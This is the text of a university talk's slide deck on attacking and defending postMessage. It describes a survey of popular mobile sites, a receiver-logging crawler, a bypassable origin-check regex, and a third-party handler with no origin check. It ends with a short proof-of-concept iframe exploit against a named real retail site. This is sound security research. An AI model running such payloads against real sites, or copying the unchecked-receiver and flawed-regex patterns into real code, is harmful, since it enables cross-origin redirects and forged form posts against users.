Inspired by the paper "The Postman Always Rings Twice" by Sooel Son and Vitaly Shmatikov (https://www.cs.utexas.edu/~shmat/shmat_ndss13postman.pdf) I researched how many of the dedicated mobile sites of the Alexa Top 10.000 have vulnerable postMessage receivers. This was part of a talk I gave at my uni, the Ruhr University Bochum.

1. THE POSTMAN ALWAYS RINGS TWICE
ATTACKING AND DEFENDING postMessage
LUKAS KLEIN
1

2. postMessage?
2

3. postMessage?
3

4. postMessage?
•controlled mechanism to circumvent SOP
3

5. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
3

6. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
•type (always “message”)
3

7. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
•type (always “message”)
•data (user supplied)
3

8. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
3

9. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
3

10. postMessage?
•controlled mechanism to circumvent SOP
•dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
4

11. •dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
postMessage?
5

12. •dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
postMessage?
http://hostname:port
6

13. •dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
postMessage?
http://hostname:port
7

14. •dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
postMessage?
http://hostname:port
8

15. •dispatches MessageEvent
•type (always “message”)
•data (user supplied)
•origin (origin of the window calling)
•source (window calling)
postMessage?
http://hostname:port
9

16. Potential Problems
10

17. Potential Problems
•You HAVE to check the origin
10

18. Potential Problems
•You HAVE to check the origin
11

19. Potential Problems
•You HAVE to check the origin
•CORRECTLY!
12

20. Mobile Detector
13

21. Mobile Detector
14

22. Mobile Detector
• for site in alexa_top_10000:
14

23. Mobile Detector
• for site in alexa_top_10000:
• desktop_url = request(site, user_agent=desktop)
14

24. Mobile Detector
• for site in alexa_top_10000:
• desktop_url = request(site, user_agent=desktop)
• mobile_url = request(site, user_agent=mobile)
14

25. Mobile Detector
• for site in alexa_top_10000:
• desktop_url = request(site, user_agent=desktop)
• mobile_url = request(site, user_agent=mobile)
14

26. Mobile Detector
• for site in alexa_top_10000:
• desktop_url = request(site, user_agent=desktop)
• mobile_url = request(site, user_agent=mobile)
• if desktop_url != mobile_url:
14

27. Mobile Detector
• for site in alexa_top_10000:
• desktop_url = request(site, user_agent=desktop)
• mobile_url = request(site, user_agent=mobile)
• if desktop_url != mobile_url:
• has_mobile_version = True
14

28. Mobile Detector
15

29. Mobile Detector
• ~ 2500 dedicated mobile sites
15

30. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
15

31. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
15

32. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
• After manual cleanup: ~2170 mobile sites remaining
15

33. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
• After manual cleanup: ~2170 mobile sites remaining
• Most common:
15

34. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
• After manual cleanup: ~2170 mobile sites remaining
• Most common:
• m.domain
15

35. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
• After manual cleanup: ~2170 mobile sites remaining
• Most common:
• m.domain
• domain/m
15

36. Mobile Detector
• ~ 2500 dedicated mobile sites
• Many false positives
• http://site.tld/?session=123 vs. http://site.tld/?session=456
• After manual cleanup: ~2170 mobile sites remaining
• Most common:
• m.domain
• domain/m
• domain/mobile
15

37. Data Collector
16

38. Data Collector
17

39. Data Collector
page.settings.userAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) …
17

40. Data Collector
page.settings.userAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) …
page.onInitialized = function() {
page.evaluate(function() {
});
};
17

41. Data Collector
page.settings.userAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) …
page.onInitialized = function() {
page.evaluate(function() {
});
};
page.open(args[1], function(status) {
phantom.exit();
});
17

42. Data Collector
page.settings.userAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) …
page.onInitialized = function() {
page.evaluate(function() {
});
};
(function(oldEventListener) {
var logReceiver = function(location, name, code) {
/*
Logs the location, receiver name and receiver code to our web api
*/
xmlhttp = new XMLHttpRequest();
xmlhttp.open('POST', 'https://collector.herokuapp.com/receivers/', true);
var params = 'url=' + encodeURIComponent(location) +
'&receiver_name=' + encodeURIComponent(name) +
’&receiver_code=' + encodeURIComponent(code);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.setRequestHeader('Content-Length', params.length);
xmlhttp.setRequestHeader('Connection', 'close');
xmlhttp.send(params);
};
// Overwrite the window.addEventListener function
window.addEventListener = function(type, listener, useCapture) {
if(/message/i.test(type)) { // If event is of type message
logReceiver(document.location, listener.name || '-', listener.toString());
}
}
})(window.addEventListener);
page.open(args[1], function(status) {
phantom.exit();
});
17

43. Data Collector
18

44. Data Collector
18

45. Data Collector
18

46. Data Collector
18

47. Data Collector
18

48. Data Collector
18

49. 19

50. 20

51. 21

52. 22

53. Data Collector
23

54. Data Collector
• ~2800 Receivers
23

55. Data Collector
• ~2800 Receivers
• ~800 Uniques
23

56. 24

57. function ka(a) {
if (/[/|.]chartbeat.com$/.test(a.origin)) {
...
}
}
25

58. [/|.]chartbeat.com$
26

59. [/|.]chartbeat.com$
27

60. [/|.]chartbeat.com$
/ or | or .
28

61. lukasklein.com/chartbeat.com
is valid!
29

62. 30

63. 31

64. 32

65. 32

66. 32

67. 32

68. 32

69. 32

70. 33

71. function (e) {
/*
Our messages are always exchanged using a string protocol,
If the data is not a string, we should skip the parsing
*/
if (typeof e.data !== 'string') return;
var message = e.data.split(',')[0]
var value = e.data.split(',')[1]
if ( message === "close" ) {
esc(value, true)
}
if ( message === "redirect" ) {
yiel.yieldify_will_redirect = true
form_refill_capture();
value = e.data.substring(e.data.indexOf(",")+1)
window.location.href = value
}
if ( message === "direct_show" ) {
yiel.fn.deleteYieldifyCookie("after_submit")
yiel_visible("campaign",value, true);
}
if ( message === "form" ) {
var s = value.split(';')[1]
s = decodeURIComponent(s)
var data = {}
var sp= s.split('&')
var key,aa;
var i;
for(i=0;i<sp.length;i++){
key = sp[i]
aa=key.split('=')
data[aa[0]] = aa[1]
}
if(value.split(';').length == 2){
yiel_post_to_url(value.split(';')[0], data, "")
}else{
yiel_post_to_url(value.split(';')[0], data, value.split(';')[2])
}
esc(value)
}
if ( message === "sales" ) {
//If click a link and the id for this campaign was asked to track sales then add
//a cookie by id for this campaign
//The value is the id
var track_sales = yiel.overlays_y[value].track_sales
if(yiel.website.track_sale!=null && yiel.website.track_sale!="" && track_sales!=null
var saleCookie = yiel.fn.getYieldifyCookie("sale")
/*if (saleCookie!=null && saleCookie!=""){
value = saleCookie + "," + value
}*/
…
34

72. No origin check
at all 35

73. But wait, there is security!
36

74. /*
Our messages are always exchanged using a string protocol,
If the data is not a string, we should skip the parsing
*/
if (typeof e.data !== 'string') return;
37

75. 38

76. String protocol
39

77. message,value
40

78. message,value
41

79. message,value
•redirect
41

80. message,value
•redirect
•form
41

81. message,value
•redirect
•form
•showalert
41

82. showalert
if ( message === "showalert" ) {
alert(value)
}
42

83. POC
43

84. <iframe id="victim" src=“
http://www.anthropologie.eu/mobile/index.jsp?currency=200004"></iframe>
<script>
var attack = function() {
var victim = document.getElementById('victim').contentWindow;
victim.postMessage('showalert,haha', 'http://www.anthropologie.eu');
};
</script>
<button onclick="attack()">Attack</button>
44

85. <iframe id="victim" src=“
http://www.anthropologie.eu/mobile/index.jsp?currency=200004"></iframe>
<script>
var attack = function() {
var victim = document.getElementById('victim').contentWindow;
victim.postMessage('showalert,haha', 'http://www.anthropologie.eu');
};
</script>
<button onclick="attack()">Attack</button>
45

86. 46

87. 47

88. Q&A
48